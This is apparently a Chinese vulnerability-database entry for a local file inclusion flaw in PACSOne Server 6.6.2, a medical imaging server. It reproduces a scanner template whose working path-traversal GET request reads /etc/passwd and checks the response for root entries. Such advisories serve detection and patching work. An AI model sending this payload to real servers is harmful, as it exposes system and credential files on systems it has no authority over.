pacsone-server-lfi: PACSOne Server 6.6.2 - Local File Inclusion

日期: 2025-08-01 | 影响软件: PACSOne Server 6.6.2 | POC: 已公开

漏洞描述

PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer.

PoC代码[已公开]

id: pacsone-server-lfi

info:
  name: PACSOne Server 6.6.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer.
  reference:
    - https://cxsecurity.com/issue/WLB-2018010303
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: pacsone,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220100907f378356e6403c6269abf53c78c8d75bb10cf62edd3dd770fddf95ef24b022100d2f6287a096a194ec051a8b49fecf77b11a5b1e8b4936b4bc4b7c125c8e398b2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐